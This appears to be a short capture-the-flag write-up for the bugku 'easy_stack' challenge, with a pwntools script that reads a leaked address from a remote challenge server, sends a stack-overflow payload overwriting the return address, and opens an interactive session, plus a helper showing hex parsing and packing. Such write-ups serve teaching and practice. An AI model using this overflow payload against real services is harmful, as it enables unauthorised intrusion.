bugku easy_stack
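This note is mainly about one small detail: how to handle the address after receiving it.
e9_addr = int(p.recvuntil(b'\n')[:-1], 16)
The service sends the address as a hex string, so int(..., 16) parses it into an integer; only then can it be passed to p32().
exp: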
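from pwn import *
elf = ELF('./pwn')
p = remote('82.157.146.43', 15644)
context.log_level = 'debug'
# The service prints the address as hex text right after this prompt
p.recvuntil(b'give u a magic_address ')
# Read up to the newline, drop the newline, parse the hex text as an integer
e9_addr = int(p.recvuntil(b'\n')[:-1], 16)
# print(e9_addr)
# 0x88 + 4 bytes of padding, followed by the address packed with p32()
payload = b'A' * (0x88 + 4)
payload += p32(e9_addr)
p.sendlineafter(b'D0 U know asm?\n', payload)
p.interactive()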
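The address handling described above, as an added example that is not part of the original post: it shows the text-to-integer-to-bytes conversion on its own, using the standard library's struct.pack('<I', ...) in place of pwntools' p32() (the two agree for pwntools' default little-endian context). The banner and address value are constructed, and the helper names parse_leak, pack32 and leak_from_banner are hypothetical.

```python
import re
import struct

# Constructed sample of the service's output; the address value is made up.
SAMPLE_BANNER = b"give u a magic_address 0xf7e4d9e9\r\n"

# Optional 0x prefix followed by one or more hex digits, nothing else.
_HEX = re.compile(rb"(?:0[xX])?([0-9a-fA-F]+)")


def parse_leak(line: bytes) -> int:
    """Parse the text form of a leaked 32-bit address into an integer."""
    token = line.strip()  # removes '\n', and also a stray '\r' or spaces
    m = _HEX.fullmatch(token)
    if m is None:
        raise ValueError(f"not a hex address: {line!r}")
    value = int(m.group(1), 16)
    if value > 0xFFFFFFFF:
        raise ValueError(f"{value:#x} does not fit in 32 bits")
    return value


def pack32(value: int) -> bytes:
    """Little-endian 4-byte encoding, i.e. what p32() produces by default."""
    return struct.pack("<I", value)


def leak_from_banner(banner: bytes, marker: bytes = b"magic_address ") -> int:
    """Find the marker, take the rest of that line, and parse it."""
    _, found, rest = banner.partition(marker)
    if not found:
        raise ValueError("marker not found in banner")
    return parse_leak(rest.split(b"\n", 1)[0])


if __name__ == "__main__":
    addr = leak_from_banner(SAMPLE_BANNER)
    print(hex(addr), pack32(addr))
    # The hex text and the packed value are different byte strings:
    print(b"0xf7e4d9e9" == pack32(addr))
```

The final comparison prints False: the ten ASCII characters the service sends are not the four raw bytes the binary expects in memory, which is why the int(..., 16) step comes before p32().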